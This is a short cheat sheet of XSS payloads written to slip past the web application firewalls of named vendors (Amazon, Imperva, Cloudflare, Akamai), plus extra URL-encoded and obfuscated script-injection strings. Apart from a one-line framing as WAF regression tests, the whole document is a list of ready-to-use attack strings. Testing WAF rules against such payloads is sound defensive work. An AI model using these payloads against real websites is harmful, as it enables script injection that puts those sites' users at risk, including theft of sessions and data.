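WAF Bypass 2024

XSS filter-evasion test strings, grouped by WAF vendor. The entries are point-in-time (2024) and may no longer match current vendor rule sets; they are mainly useful as regression cases when tuning WAF rules, which complement output encoding and a Content-Security-Policy and do not replace them.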

Source: https://github.com/Edr4/XSS-Bypass-Filters

#payloads
-------------

#Amazon

<details/open/id="&quot;"ontoggle=[JS]>    (no-click)

#Imperva

<details/open/id="&quot;"ontoggle=[JS]>     (no-click) 

#Cloudflare

<img//////src=x oNlY=1 oNerror=alert('xxs')//
<img src=x on onerror=alert()>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
<svg onload=prompt%26%230000000040document.domain)>

<a"/onclick=(confirm)()>Click%20Here!   (href-bypass)

#Akamai

<details open id="' &quot;'"ontoggle=[JS]>   (no-click)

<math><edra href=Ja&Tab;vascript&colon;console.error(1)>HERE</edra></math>   (click)

#Extra XSS payloads 

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") > 

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> 
twitter.com/Botami143/stat…

# WAF / Cloudflare Bypass

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> 

<a href=[ ]"  onmouseover=prompt(1)//">XYZ</a>

<script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/

<blink/  onmouseover=prompt(1)>OnMouseOver 

<svg> <foreignObject width="100%" height="100%">     <body> <iframe src='javascript:confirm(10)'></iframe>     </body>   </foreignObject> </svg>


<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>


jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> "'alert(1)
